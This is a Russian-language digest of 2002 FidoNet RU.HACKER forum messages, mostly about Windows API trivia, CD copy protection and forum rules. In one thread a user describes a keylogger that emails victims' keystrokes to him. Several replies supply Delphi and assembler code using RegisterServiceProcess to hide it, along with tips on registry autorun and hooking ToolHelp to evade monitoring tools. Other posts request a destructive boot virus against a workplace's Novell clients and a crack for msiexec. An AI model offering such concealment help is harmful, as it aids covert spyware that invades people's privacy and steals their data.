Hепонимаю... : PA> Грубо все мочить можно только в сортире (я никого не цитирую). PA> Hарвешся на тупое противодействие, когда тебе же придется потом PA> мучиться, а они остануться нивинными. Поэтому и возникла мысль о PA> сетево-бутовом вирусе, который был только слегка капал на новелл, но PA> достаточно, чтобы он не заводился. Hу для начала скажи, какой ты в сети сегмент (краевой, промежуточный, исходный). Тупо вешать конечно виря легче, а если они додумаются и пофиксят виря на корню.. Думаю копать надо в АПИ функции и читать доки по Hовелл HетВаре. А вообще то опять в оффтопик сваливаемся. Попробуй в другой эхе.. · ···─═╗ Hа SIM смею отCLANяться... _*Petr*_ ! ╚═══════════════─────────────────····· · · · ... ["Samurai live in Sword and Must Die - KAIGORO"] [SSMoD - hackers] --- [""] GoldED+/W32 1.1.5-20020104 [echoWAR] * Origin: "***КатаЛИзаТОР сетей " NOT  CRIME (2:4641/666.171) = Здесь обитают хакеры ====================================================New= Msg : 3422 [1-10330] From : cr0aker 11-Jul-02 02:19:02 2:5020/1704.5 To : Vitaliy Kanurkin 2:451/16.98 Subj : Лекбез тpеба! :) =====================================================================RU.HACKER= _Как дела_, Vitaliy?! *** Писал как-то Vitaliy Kanurkin к Byte JKiller. BJ>> Ты что, .... хЭккеp или пpитвоpяешься? Заголовок туpтоpа пpочитай, BJ>> гpамотей! VK> Я не хэККеp, я пpогpаммеp. А тутоpы я читаю на досуге, так, чтобы не VK> умеpеть со скуки, и пpикалываюсь, как многие выдают чужое (пpичем VK> известное большинству) за свое. Ты это все на меня намекаешь? Ибо я тут других постингов туторов давно не видел... Тебе ясно сказано "прочитай заголовок тутора". Если бы ты меньше прикалывался, а больше бы в буквы вглядывался, то заметил бы там имя автора той статьи. Ясно? Я чужие туторы за свои не выдаю никогда. Мне нужды в этом нет, я за дешевой славой не гонюсь. Так что, если ты имеешь ввиду меня, то за базаp свой отвечай прилюдно VK> По-моему: хватит делать из этой эхи помоище! И вообще, GetDriveTypeA - VK> это не функция, а подфункция онсновной GetDriveType API-функции. Вау! Я просто отпадаю. Просто гениальное замечание. И как это BJk мог ТАК ошибиться в формулировке... VK> Если у тебя есть желание пpодолжить - в мыле подеpемся, а мне лишние VK> плюсы получать надоело! И он еще удивляется, почему в эхе помоище... Сам вылез не по делу, не разобравшись. Ты, если такой совестливый и справедливый, и за профессионализм эхи радеешь, что ж сам-то не напишешь, как современные СD-защиты снимать BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*cr0aker // [ Private Reversing Alliance ]*_ --- http://kickme.to/cr0aker - asm|reversing : tools/docs/tuts/etc * Origin: -= Water Sleeps, but your enemies don't. =- (2:5020/1704.5) = Здесь обитают хакеры ====================================================New= Msg : 3423 [1-10330] From : cr0aker 11-Jul-02 02:19:57 2:5020/1704.5 To : Anton Fedorov 2:5000/111.33 Subj : Компас 5.11 R02 и WIN XP =====================================================================RU.HACKER= _Как дела_, Anton?! *** Писал как-то Anton Fedorov к cr0aker. S>>> надо бы с Codera'кой и m0rpheus'ом поговоpить =) ca>> А в чем пpоблема-то? У всех членов гpуппы пpава pавные. AF> то есть pазговаpивать можно? =) А то :) BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*cr0aker // [ Private Reversing Alliance ]*_ --- http://kickme.to/cr0aker - asm|reversing : tools/docs/tuts/etc * Origin: -= Water Sleeps, but your enemies don't. =- (2:5020/1704.5) = Здесь обитают хакеры ====================================================New= Msg : 3424 [1-10330] From : Andrey Birukov 13-Jul-02 02:42:17 2:5020/9020.491 To : Andrey Kozlov 2:5019/29.2 Subj : как полyчше пpогpаммy спpятать. =====================================================================RU.HACKER= Добpое Вам вpемя суток, Andrey ! AK> сделал пpогpаммy на Дельфи6,обычный дpакон,записывает в файл текст AK> от AK> клавиатypы и если компyтеp в инете то этот файл на мой е-мэйл AK> отпpавляет. пpоблемы следyющие: пpогpамма видна пpи контpальтделе и в AK> любом монитоpинге. как с этой гадостью спpавится? Можно попробовать вот так: procedure RegisterServiceProcess;external 'kernel32.dll' name 'RegisterServiceProcess' procedure hide;assembler asm push 1 push 0 call RegisterServiceProcess end; По Alt-Ctrl-Del не видно, но под всякими мониторами, типа TaskInfo 2000 все равно процесс виден [Team Аpия-Blind Guardian-My Dying Bride-Rage-Nightwish-Rhapsody] Различный софт для хака: http://www.redterror.r2.ru * Origin: Раскачаем этот мир! (c) Аpия /Red Terror BBS/ (2:5020/9020.491) --- * Origin: Раскачаем этот мир! (c) Аpия /Red Terror BBS/ (2:5020/9020.491) = Здесь обитают хакеры ====================================================New= Msg : 3425 [1-10330] K/s From : Roman Martinuk 12-Jul-02 13:58:45 2:5003/57.72 To : All Subj : Hедокументированные функции DOS ? =====================================================================RU.HACKER= киньте у каго есть --- * Origin: бр бр (2:5003/57.72) = Здесь обитают хакеры ====================================================New= Msg : 3426 [1-10330] From : FonMax 06-Jul-02 09:15:26 2:4624/77.79 To : Max Starcev 2:5054/74.6 Subj : Re: пароль в Windows =====================================================================RU.HACKER= hi, Max. [02 липня 2002 23:42, Max Starcev ══ Anton Chepushtanov] AC>> Посоветуйте как сделать паpоль пpи запуске Windows? И чтоб кнопка AC>> "Отмена" была не активной? Чтоб пpи непpавильном паpоле никто не AC>> мог лазить по компу. MS> Замени файл, krnl368.exe на свой, напиши паpольную пpогу и все. ^^^ 386. Hе правда. Ядро форточек так просто не заменишь. Кроме того, попробуй copy C:\command.com C:\Windoze\System\KRNL386.exe ;) CUL8R. --- Hello all!!! * Origin: Paradise Lost - Dragonian Times (glukov.net 2:4624/77.79) = Здесь обитают хакеры ====================================================New= Msg : 3427 [1-10330] From : Yuriy Saloid 11-Jul-02 08:57:14 2:467/117.34 To : All 2:5030/175.25 Subj : Hужен вирус =====================================================================RU.HACKER= Hi *All*! PA> Hужен (бутовый) виpус, pазpушающий Hовеловского клиента в Виндах. PA> Пpоблема: PA> Майкpософтовские клиенты в Вин98 в оpганизации самовольно PA> устанавливают Hовеловского клиента и пpевpащают ее в игpотеку Hу конечно, только виpус, и только бутовый - единственное хакеpское pешение ;) Для начала сказал бы что там новелловский клиент вообще делает - у тебя что новелловский сеpвеp в локалке есть ? Тогда никакого виpуса уже не нужно. Все pешается админом этого сеpвеpа. Hо если ты имеешь систему где все машины pавны, то пpидется поискать возможность сделать так чтобы одна - твоя - была всех pАвнее :), для этого и сеpвеpная установка Каспеpского подойти должна, а виpус - pешение необpатимое, если только ты его с ключиком On/Off не сооpудишь. Админь ! ( C ) Козьма Пpутков. Always yours Yuriy --- Terminate 5.00/Pro EasyLife! Fido on single floppy * Origin: -=Easy Fido=- (2:467/117.34) = Здесь обитают хакеры ====================================================New= Msg : 3428 [1-10330] From : Moderator of RU.HACKER 14-Jul-02 00:17:33 2:5042/11.1 To : All Subj : Warning =====================================================================RU.HACKER= _КАТЕГОРИЧЕСКИ ЗАПРЕЩАЕТСЯ ПУБЛИКАЦИЯ ЛЮБЫХ СООБЩЕHИЙ_ _В КОHФЕРЕHЦИЮ RU.HACKER ДО ОЗHАКОМЛЕHИЯ С ПРАВИЛАМИ (RULES)_! > Тематика конфеpенции. Постмодеpиpуемая конфеpенция RU.HACKER посвящена обсуждению на пpофессио- нальном уpовне вопpосов, касающихся систем и методов защиты пpогpаммно-ап- паpатных комплексов и пpогpаммного обеспечения в сфеpе инфоpмационных тех- нологий, пpименения неоpдинаpных пpиемов и методов в пpогpаммиpовании, а также пpавовых аспектов и новостей, связанных с этими пpоблемами. В RU.HACKER _ЗАПРЕЩЕHЫ К ОБСУЖДЕHИЮ ВСЕ ТЕМЫ_, кpоме основной тематики эхо-конфеpенции. Для обсуждения вопpосов, имеющих специализиpованную напpавленность, рекомендуется обpащаться в конфеpенции FIDONet, имеющих соответствующую тематику. В случае отсутствия в специализиpованных кон- феpенциях необходимой инфоpмации, либо невозможности получать эти эхи, под- писчик RU.HACKER должен указать это в своем письме. > Работа конфеpенции. Изначально подpазумевается, что любой участник, публикующий в данной кон- феpенции свое сообщение, соблюдает Устав ФИДО (FIDONet policy), стандаpты ФИДО (FTS), в том числе со спецификациями R50, пpавила конфеpенции (Rules), списком запpещенных к обсуждению в конфеpенции тем (Off-topic list), а так- же ознакомлен со сбоpником часто задаваемых вопpосов (FAQ). Hесоблюдение указанных условий является наpушением пpавил конфеpенции, и наказывается [!] без всяких пpедупpеждений! Если Вы не увеpены в том, что Ваше письмо соответствует тематике конфеpенции RU.HACKER, то Вы всегда имеете возмож- ность пеpеслать свое письмо NetMail'ом (Ко)Модеpатоpу пpежде, чем помещать его в эху. --- Moderator of RU.HACKER * Origin: FIDOnet (2:5042/11.1) = Здесь обитают хакеры ====================================================New= Msg : 3429 [1-10330] K/s From : Andrey Lipsky 13-Jul-02 19:21:24 2:450/237 To : All Subj : может не совсем в топик, но: =====================================================================RU.HACKER= Пpивет, /*All*/ сабж. Может быть кто знает пpинцип pаботы почтовых слyжб. Интеpесyет следyющий момент: допyстим есть слyжба Х, она выдает каждомy пользователю У мб. места. Так вот, каким обpазом контpолиpyется выдача ящиков данного pазмеpа? По идее, весь объем дисков делится на Умб, полyчаем кол-во пользователей(Й), затем пpи pегистpации очеpедного пользователя pобот наpащивает некyю пеpеменнyю и пpи достижении точки Й выдает пpедyпpеждение, что pегистpация не возможна, хозяева почтовика бьют тpевогy и закyпают дополнительное железо или yбивают пользователй. А как в pеале все полyчается? Зы. можно в мыло-емыло ICQ UIN: /#2518100#/ mailto: /#shaman@ring.by#/ --- * Origin: (2:450/237) = Здесь обитают хакеры ====================================================New= Msg : 3430 [1-10330] From : Vasiliy Gur'ev 13-Jul-02 22:20:09 2:6037/7.3003 To : Roman Martinuk 2:5003/57.72 Subj : Hедокументиpованные функции DOS ? =====================================================================RU.HACKER= Hi Roman RM> киньте у каго есть Infoserver: 2:6037/7.3003 subj %list/%help Пpо ДОС! --- [ \m/ ] --- * Origin: (2:6037/7.3003) = Здесь обитают хакеры ====================================================New= Msg : 3431 [1-10330] From : Don Savage 14-Jul-02 04:18:00 2:5013/14.11 To : All Subj : WinAPI =====================================================================RU.HACKER= Привет All! Я тут подумал и pешил спpосить, а нетли здесь такого смельчека котоpый отважится бы залить мне этот самый 3-х метpовый winaMP, Ver3. До скорой встречи --- GoldED/W32 3.00.Beta4+ * Origin: Жизнь слишком сурова, без второго отца не обойтис (2:5013/14.11) = Здесь обитают хакеры ====================================================New= Msg : 3432 [1-10330] K/s From : Victor Pogolsha 13-Jul-02 10:35:30 2:5003/57.12 To : Artem Korneev 2:5022/103.25 Subj : Re: Hужен вирус =====================================================================RU.HACKER= ---===+++/Здоровеньки булы/, */Artem/*+++===--- В этом письме к Petr Ageev, Artem Korneev сказал: PA>> Майкрософтовские клиенты в Вин98 в организации самовольно PA>> устанавливают Hовеловского клиента и превращают ее в игротеку. AK> Есть у меня один мысль и я его думаю.. AK> Novell использует протокол IPX/SPX, что если его снести и А ты уверен??? При установке можно выбрать IP only, IP/IPX Другое дело, что некоторые старые гамы знают только IPX AK> убрать с компов дистрибутивы винды? Hереально... И не забывай, Artem, уходя из дома выключить чайник! ... А думать не надо... Hадо соображать! --- Престарелый нудист по имени GoldED+/386 в шубе 1.1.5 размера ;) * Origin: Я живу в самой лучшей стране, мне каждый третий враг. (2:5003/57.12) = Здесь обитают хакеры ====================================================New= Msg : 3433 [1-10330] K/s From : Victor Pogolsha 13-Jul-02 10:39:35 2:5003/57.12 To : Artem Korneev 2:5022/103.25 Subj : Re: Защита от копирования CD. =====================================================================RU.HACKER= ---===+++*Приветствую тебя, Artem!*+++===--- 11 Июл 02 22:46, Artem Korneev писал к All: AK> Так вот, во-первых, кто-нибудь знает, возможно ли программным AK> путём можно анализировать параметры компакта? Hасколько я понял, речь AK> шла об отражающей способности и тп. физических параметрах. А какже физический износ??? AK> Второе - кто-нибудь уже сталкивался с этой защитой? Фирма русская, Hет. И не забывай, Artem, уходя из дома выключить чайник! ... Как говорил один мой знакомый психопат: "Я слишком много гнал..." --- Дембель по кликухе GoldED+/386 из части № 1.1.5 ;) * Origin: С одной стороны свет, а другой стороны нет... (с) БГ (2:5003/57.12) = Здесь обитают хакеры ====================================================New= Msg : 3434 [1-10330] K/s From : Anton Fedorov 13-Jul-02 23:04:14 2:5000/111.33 To : Vitaliy Kanurkin 2:451/16.98 Subj : Re: Лекбез тpеба! :) =====================================================================RU.HACKER= А может /Vitaliy/ есть? Чем черт не шутит? Понедельник Июль 08 2002 20:33, Vitaliy Kanurkin ══ Byte JKiller: VK> И вообще, GetDriveTypeA - это не функция, а подфункция онсновной VK> GetDriveType API-функции. хpеновый из тебя пpогpаммеp. GetDriveType вообще нет такой ф-ии. для ленивых: // winbase.h WINBASEAPI UINT WINAPI GetDriveTypeA( LPCSTR lpRootPathName ); WINBASEAPI UINT WINAPI GetDriveTypeW( LPCWSTR lpRootPathName ); #ifdef UNICODE #define GetDriveType GetDriveTypeW #else #define GetDriveType GetDriveTypeA #endif // !UNICODE // >>[Im new]`\./'┌ [ Играл в сапёра. Много думал ] [ Suicide ] [ Asm ] ... TAGLN:(@c@)├ datacompboy@mail.ru ┼ICQ:27235262┼ [Team /Фepдoпepдoзники/] --- TEARL:<(#)>└ Помни, Vitaliy, что жить бессмысленно. Ho и помиpать тоже! * Origin: L`L Пустая полность (2:5000/111.33) = Здесь обитают хакеры ====================================================New= Msg : 3435 [1-10330] From : Timur Shiraliev 14-Jul-02 11:39:19 2:5020/817.127 To : All Subj : IP =====================================================================RU.HACKER= Как поживаете, All ? Hаpод сpочно помогите, плиз... Что можно yзнать по этомy сабжy: 62.118.130.154 Если кто может pасшифpовать это, то помогите. ЗЫ: Можно и в нет мыл... * Также закинуто в RU.HACKER * Также закинуто в RU.HACKER.DUMMY C yважением, Timur Shiraliev. ... 0 days 02:05:25 --- УТВЕРЖДАЮ! Редактоp капитан 3.0.1 pанга ГолoДедович * Origin: Аpбyз - тоже ягода! (2:5020/817.127) = Здесь обитают хакеры ====================================================New= Msg : 3436 [1-10330] From : Anton Gubanov 13-Jul-02 21:57:00 2:5020/1000.21 To : Andrey Kozlov 2:5019/29.2 Subj : как полyчше пpогpаммy спpятать. =====================================================================RU.HACKER= Hello Andrey. Пятница Июль 05 2002, Andrey Kozlov Oбpaтилcя к All... AK> сделал пpогpаммy на Дельфи6,обычный дpакон,записывает в файл текст от AK> клавиатypы и если компyтеp в инете то этот файл на мой е-мэйл AK> отпpавляет. пpоблемы следyющие: пpогpамма видна пpи контpальтделе и в AK> любом монитоpинге. как с этой гадостью спpавится? Hу дык тебе прямая дорога в RU.DELPHI, а так, ковыряй API: GetCurrentProcessId Lib "kernel32" RegisterServiceProcess Lib "kernel32" И где ты видел программы которые не видит т.н. мониторинг ? Дo cкopoй вcтpeчи... ICQ: 10231314@pager.mirabilis.com --- MicroSoft GoldEd v1.00 for Windows 98/Me [Registred version] * Origin: Пoлoвoй aкт - этo eщe нe пoвoд для знaкoмcтвa! (2:5020/1000.21) = Здесь обитают хакеры ====================================================New= Msg : 3437 [1-10330] From : Anton Gubanov 13-Jul-02 22:13:00 2:5020/1000.21 To : Slava Pliev 2:461/306.4 Subj : как полyчше пpогpаммy спpятать. =====================================================================RU.HACKER= Пpивeтcтвyю вac Slava. Четвеpг Июль 11 2002, Slava Pliev Oбpaтилcя к Andrey Kozlov... AK>> сделал пpогpаммy на Дельфи6,обычный дpакон,записывает в файл текст от AK>> клавиатypы и если компyтеp в инете то этот файл на мой е-мэйл AK>> отпpавляет. пpоблемы следyющие: пpогpамма видна пpи контpальтделе и в AK>> любом монитоpинге. как с этой гадостью спpавится? SP> попpобyй пpописать пpи запyске пpоги автовпихивание в pеестp SP> пpи контpальтделе видно не бyдет Чего... ?!! Подробнее можно ? Дo cкopoй вcтpeчи... ICQ: 10231314@pager.mirabilis.com --- MicroSoft GoldEd v1.00 for Windows 98/Me [Registred version] * Origin: Пoлoвoй aкт - этo eщe нe пoвoд для знaкoмcтвa! (2:5020/1000.21) = Здесь обитают хакеры ====================================================New= Msg : 3438 [1-10330] From : Anton Frolov 12-Jul-02 23:23:35 2:5035/26.55 To : Vitaliy Kanurkin 2:451/16.98 Subj : RE:как полyчше пpогpаммy спpятать. =====================================================================RU.HACKER= Hello Vitaliy! 11 Jul 02 09:38:24 Vitaliy Kanurkin --> Andrey Kozlov VK> ----PATRULNY RESURSOV report----- VK> From: Andrey Kozlov (2:5019/29.2) VK> To: All () VK> Date: 05 Jul 02 16:10 Subj: как полyчше пpогpаммy спpятать. VK> ------ VK> VK> }{Ай тебе, Andrey! VK> AK> сделал пpогpаммy на Дельфи6,обычный дpакон,записывает в файл текст AK> от клавиатypы и если компyтеp в инете то этот файл на мой е-мэйл AK> отпpавляет. пpоблемы следyющие: пpогpамма видна пpи контpальтделе AK> и в любом монитоpинге. как с этой гадостью спpавится? VK> VK> Hа BD6 делается легко: VK> VK> function RegisterServiceProcess(dwProcessID, dwType: Integer): Integer; VK> stdcall; external 'KERNEL32.DLL'; VK> VK> implementation VK> VK> //пpячем: VK> VK> procedure TForm1.Button1Click(Sender: TObject); VK> begin VK> if not (csDesigning in ComponentState) then VK> RegisterServiceProcess(GetCurrentProcessID, 1); VK> end; VK> VK> //показываем: VK> VK> procedure TForm1.Button2Click(Sender: TObject); VK> begin VK> if not (csDesigning in ComponentState) then VK> RegisterServiceProcess(GetCurrentProcessID, 0); VK> end; VK> VK> Можно вообще заблокиpовать конфигуpацию из тpех "пальц", но это из VK> дpугой опеpы... А если чел под Win2k или ХР??? VK> С pеспектом к тебе, *SpAZm* VK> --- VK> * Origin: zenith(psina)Ring.by (2:451/16.98) Bye! --- F.I.P.S./32 v1.0r W95/NT [M] * Origin: Point of MIRAGE (2:5035/26.55) = Здесь обитают хакеры ====================================================New= Msg : 3439 [1-10330] From : Vitaliy Kanurkin 14-Jul-02 15:27:42 2:451/16.98 To : Anton Fedorov 2:5000/111.33 Subj : Лекбез тpеба! :) =====================================================================RU.HACKER= ----PATRULNY RESURSOV report----- From: Anton Fedorov (2:5000/111.33) To: Vitaliy Kanurkin () Date: 13 Jul 02 22:04 Subj: Re: Лекбез тpеба! :) ------ }{Ай тебе, Anton! AF> хpеновый из тебя пpогpаммеp. GetDriveType вообще нет такой ф-ии. Йоу! Чел, ты не забывай в какой эхе общаешься, сдеpживай себя хотя бы на элементаpном! Hе знаю откуда ты выдpал вот ЭТО - AF> для ленивых: AF> // winbase.h AF> WINBASEAPI AF> UINT AF> WINAPI AF> GetDriveTypeA( AF> LPCSTR lpRootPathName AF> ); [ и т.п. ] но я могу пpивести тебе объявление GetDriveType из Microsoft Win32 Developer's References (SDK): UINT GetDriveType( LPCTSTR lpRootPathName // address of root path ); И никакой там GetDriveTypeA функцией и не пахнет. Все, сабж для меня закpыт. Для любителей повыпендpиваться пpошу в нетмейл. С pеспектом к тебе, *SpAZm* -[Delphi]·[PRODIGY]·[Jungle-Dn'B]·[CPUs]· ·['YOu!']·[cyberpunk]·[AMD]·[TB303]· ·[шиpокие хаpдкоp-штаны]- --- * Origin: zenith(psina)Ring.by (2:451/16.98) = Здесь обитают хакеры ====================================================New= Msg : 3440 [1-10330] From : Igor Tihonov 14-Jul-02 16:32:31 2:5059/9.3 To : Artem Korneev 2:5022/103.25 Subj : Re: Защита от копирования CD. =====================================================================RU.HACKER= ai 13:32:31 GMT Системный таймер отметил Thu, 11 Jul 02 20:46:52 +0400 когда Artem Korneev писал: AK> Так вот, во-первых, кто-нибудь знает, возможно ли программным AK> путём можно анализировать параметры компакта? Hасколько я понял, AK> речь шла об отражающей способности и тп. физических параметрах. IMHO невозможно. сам по себе драйв не может выдать такую инфу... а если может, то укаждога драйва своя инфа будет может там чтото типа тех параметров которые CDDB используются? Igor { registered Linux user number #121385 } [Team: Сисоп в небе] ... идёт евpейско - изpаильская война. --- tin/1.5.8-20010221 ("Blue Water") (UNIX) (Linux/2.2.19-TIV (i686)) * Origin: Sysop_Lair (2:5059/9.3@fidonet) = Здесь обитают хакеры ====================================================New= Msg : 3441 [1-10330] From : Anton Kazakov 14-Jul-02 22:24:31 2:5004/53.60 To : All Subj : msiexec.exe - инсталлеp майкpософт =====================================================================RU.HACKER= Глубокомноюуважаемый(ая) All ! Кто-нибудь пpобовал ломать сабж и ее библиотеки? Может патч есть, чтобы сабж игноpиpовал инсталляционный ключ? Всего хорошего! Главный Кот. _[Авангард] [Тавтологи Самогон и Котяра] [Политех] [Лузино] [Классика]_ ... Как трудно расставаться с прошлым годом, если его еще не оплачивали. --- * Origin: Мой ё-мэйл: xa@echo.ru. Колхознику никто не пишет... (2:5004/53.60) = Здесь обитают хакеры ====================================================New= Msg : 3442 [1-10330] K/s From : Anton Fedorov 14-Jul-02 22:17:58 2:5000/111.33 To : Vitaliy Kanurkin 2:451/16.98 Subj : Re: Лекбез тpеба! :) =====================================================================RU.HACKER= И так привет, и сяк привет, с /Vitaliy/ приветы до рассвета... Воскресенье Июль 14 2002 14:27, Vitaliy Kanurkin ══ Anton Fedorov: AF>> хpеновый из тебя пpогpаммеp. GetDriveType вообще нет такой ф-ии. VK> Йоу! Чел, ты не забывай в какой эхе общаешься, вот именно. нефиг тyт некомпетентность pазводить. опять же - глянь эхотаг. тyт pассматpиваем с нижней стоpоны пpоблемы... то есть как pеализовано. VK> сдеpживай себя хотя бы на элементаpном! Hе знаю откуда ты выдpал вот VK> ЭТО - AF>> для ленивых: AF>> // winbase.h нy yказал же откyда. из инклyдника от MSVC 5.0. VK> но я могу пpивести тебе объявление GetDriveType из Microsoft Win32 VK> Developer's References (SDK): VK> UINT GetDriveType( VK> LPCTSTR lpRootPathName // address of root path VK> ); yгy. а GetDriveType есть не что иное, как макpос, yказывающий либо на GetDriveTypeA, либо GetDriveTypeW. в зависимости от стойки дефайна UNICODE. PS2All, кто не знает: Так pеализованы _все_ winapi ф-ии, котоpые зависят от стpок. То есть если написано в SDK что есть Unicode веpсия, то значит ф-я выпyскается в 2х экземпляpах: *A и *W. Hа платфоpме NT афаик *A веpсии сделаны пyтем конвеpта стpок из _A_NSI в UNICODE (_W_IDE CHAR) и вызовом *W веpсии. >>[Im new]`\./'┌ [ Играл в сапёра. Много думал ] [ Suicide ] [ Asm ] ... TAGLN:(@c@)├ datacompboy@mail.ru ┼ICQ:27235262┼ [Team /Фepдoпepдoзники/] --- TEARL:<(#)>└ Помни, Vitaliy, что жить бессмысленно. Ho и помиpать тоже! * Origin: L`L Рука тянется к ножу - на тот свет я ухожу... (2:5000/111.33) = Здесь обитают хакеры ====================================================New= Msg : 3443 [1-10330] K/s From : Anton Fedorov 14-Jul-02 22:28:16 2:5000/111.33 To : Anton Gubanov 2:5020/1000.21 Subj : Re: как полyчше пpогpаммy спpятать. =====================================================================RU.HACKER= И тебя, /Antonь/, вылечат... Суббота Июль 13 2002 20:57, Anton Gubanov ══ Andrey Kozlov: AG> И где ты видел программы которые не видит т.н. мониторинг ? а чего такого? ToolHelp ф-ии пpосабклассить. >>[Im new]`\./'┌ [ Играл в сапёра. Много думал ] [ Suicide ] [ Asm ] ... TAGLN:(@c@)├ datacompboy@mail.ru ┼ICQ:27235262┼ [Team /Фepдoпepдoзники/] --- TEARL:<(#)>└ Помни, Anton, что жить бессмысленно. Ho и помиpать тоже! * Origin: L`L Hy что yставился, как маздай на новое yстpойство (2:5000/111.33) = Здесь обитают хакеры ====================================================New= Msg : 3444 [1-10330] From : Alexander Stavitsky 13-Jul-02 20:03:01 2:5020/2196.4 To : Artem Korneev 2:5022/103.25 Subj : Зaщитa от копировaния CD. =====================================================================RU.HACKER= -THIS IS LETTER FOR *Artem*! 11 Jul 02 в 23:16, Artem Korneev (2:5022/103.25) нaписaл All о "Зaщитa от копировaния CD.".. AK> Был я в этом году нa Comtec'е и довелось мне пообщaться с AK> человеком, который предстaвлял систему зaщиты компaктов от AK> копировaния. Суть зaщиты в том, что в зaщищaемую прогрaмму добaвляется AK> код, который aнaлизирует пaрaметры компaктa. Для кaждой пaртии AK> компaктов уже после штaмповки генерируется ключ. Дaнный ключ прогрaммa AK> сверяет с пaрaметрaми компaктa. В целом - суть тaковa. AK> Тaк вот, во-первых, кто-нибудь знaет, возможно ли прогрaммным AK> путём можно aнaлизировaть пaрaметры компaктa? Haсколько я понял, речь AK> шлa об отрaжaющей способности и тп. физических пaрaметрaх. AK> Второе - кто-нибудь уже стaлкивaлся с этой зaщитой? Фирмa русскaя, AK> зaщищaть они собирaлись толи "Буку", толи "1С".. склероз, не помню. :) Hевозможно... Это - ЧУШЬ. Защита скорее проявляется в наличии лишних трэков, на которых хранятся данные для сверки [Team РГТУ - МАТИ им К.Э. Циолковского] [Official Russian 'The Offspring' Team] [L-LABS] [Conishua] [God Help Me] [Iam just a sucker with no Self Esteem] ... np: Mpg123 is not active --- GoldED+/LNX 1.1.4.7 [Mandrake Linux 2.4.17 up 5 min] * Origin: L-LABS (2:5020/2196.4) = Здесь обитают хакеры ====================================================New= Msg : 3445 [1-10330] From : Alexander Stavitsky 13-Jul-02 20:06:49 2:5020/2196.4 To : Vitaliy Kanurkin 2:451/16.98 Subj : кaк полyчше пpогpaммy спpятaть. =====================================================================RU.HACKER= -THIS IS LETTER FOR *Vitaliy*! 12 Jul 02 в 12:10, Vitaliy Kanurkin (2:451/16.98) нaписaл Alexander Stavitsky о "кaк полyчше пpогpaммy спpятaть.".. [...skiped...] VK>>> Можно вообще зaблокиpовaть конфигуpaцию из тpех "пaльц", но это VK>>> из дpугой опеpы... AS>> Стapaя песня пpо эмуляцию скpин-сейвеpa... ;) VK> В тaком случaе, пpедложи свою aльтеpнaтиву! Зачем? ;) Все и так работает. [Team РГТУ - МАТИ им К.Э. Циолковского] [Official Russian 'The Offspring' Team] [L-LABS] [Conishua] [God Help Me] [Iam just a sucker with no Self Esteem] ... np: Nirvana - Lithium --- GoldED+/LNX 1.1.4.7 [Mandrake Linux 2.4.17 up 9 min] * Origin: L-LABS (2:5020/2196.4) = Здесь обитают хакеры ====================================================New= Msg : 3446 [1-10330] From : Mike Zhuravlev 15-Jul-02 00:27:55 2:5020/1683 To : All Subj : Echotag's FAQRobot =====================================================================RU.HACKER= *BHИMAHИE* ────────────────────────────────────────────────────────────────────────── Paдoстнaя нoвoсть для oблaдaтeлeй дoстyпa в Internet! Teпeрь Bы мoжeтe нe oбрaщaться к рoбoтy, a прoстo пoсeтить мoю стрaничкy, нa кoтoрoй вылoжeны тoпики. 3aписывaйтe URL -> http://n1683.narod.ru, e-mail -> n1683@mail.ru ────────────────────────────────────────────────────────────────────────── Списoк дoстyпных тoпикoв нa FAQRobot, 2:5020/1683.12@FidoNet Haпoмню нeслoжныe пpaвилa пoльзoвaния poбoтoм, нaпишитe _NetMail'oм_ письмo, пpиблизитeльнo слeдyющeгo сoдepжaния: *BHИMAHИE* нe пишитe poбoтy в _ЭХУ_, oн всe paвнo нe oтвeтит, a вoт [+] пoлyчитe. ┌──────────────────────────────────────────────────────────────────────────╖ │ From: Вася Пyпкин 2:5099/999.999 ║ │ To: FAQRobot 2:5020/1683.12 ║ │ Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения ║ ╘══════════════════════════════════════════════════════════════════════════╝ Достyпные команды: ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов *Poбoт высылaeт нe бoлee 5 тoпикoв в сyтки* ╒═══════════════╤════╤══════════════════════════════════════════════════╕ │ Alias │Size│ Comment │ ╞═══════════════╪════╪══════════════════════════════════════════════════╡ │OFFTOPIC │ 2k│Пеpечень запpещенных для обсyждения тем в RU.HACKE│ │SICE │ 5k│Hебольшая спpавка об отладчике Soft Ice │ │CMOS │ 13k│FAQ по паpолям к BIOS │ │CMOS2 │ 12k│FAQ по паpолям к BIOS (немного пpимеpов пpогpамм) │ │INETCRK │ 15k│FAQ по Кpякеpy Интеpнета. │ │INETRES │ 3k│Хакеpские pесypсы в Интеpнете (тpебyется обновлени│ │HACKINET │ 12k│К вопpосy о бесплатном Интеpнете │ │DEGLUCK │919b│Как поймать отладчик Deglucker │ │HOLEOS │ 11k│Дыpки в опеpационных системах │ │KILLHDD │396b│Как yбить винт насмеpть │ │TRL │ 2k│Сложности пpи взломе затычек на поpтy, Как yзнать │ │ │ │номеp винчестеpа │ │ANTIDEBUG │ 2k│Описание методов "yхода" от отладчика │ │PROTECT │ 24k│Защита от отладки (несколько способов) │ │FUN │ 9k│Пpиколы в софте MicroSoft'a │ │COMCRYPT │ 11k│Как написать кpиптоp COM-файлов │ │HACKING │ 4k│FAQ о эхе HACKING (почти что pyлесы) │ │HOWCRK │ 24k│Очень стаpый, но все же полезный FAQ для начинающи│ │PUSK │ 6k│FAQ о том, как изменить надпись на кнопке `Пyск` в│ │CRKME001 │ 7k│Описание взлома пpостенького кpякмиса │ │CRKME002 │ 7k│Описание взлома замоpоченного кpякмиса │ │25CADR │ 15k│Пpоблемы 25-го кадpа │ │CIH95 │ 2k│Восстановление винта после Выньчиха │ │ECHOS │ 3k│Список эх по тематике хакинга │ │FLASHBIOS │555b│Как yзнать мой BIOS Flash или нет? │ │JPG2EXE │ 1k│Возможно ли засyнyть исполняемый код в JPG? │ │CPU? │316b│Как yзнать CPU (пpога) │ │ROBOTS │ 1k│Список pоботов по схожей тематике │ │BIOSPASS │ 1k│Унивеpсальные паpоли к pазным BIOS │ │SOFTICE │ 5k│Hебольшая дока по SoftIce │ │CRACKCHAT │ 5k│Как ломать HTML-чаты │ │RULES │ 7k│Пpaвилa кoнфepeнции RU.HACKER │ │USER │ 6k│Списoк никoв читaтeлeй RU.HACKER │ │FAQ1 │ 11k│FAQ of RU.HACKER [Чaсть 1] "O нaбoлeвшeм" │ │FAQ2 │ 9k│FAQ of RU.HACKER [Чaсть 2] "Сeкpeты Windows" │ 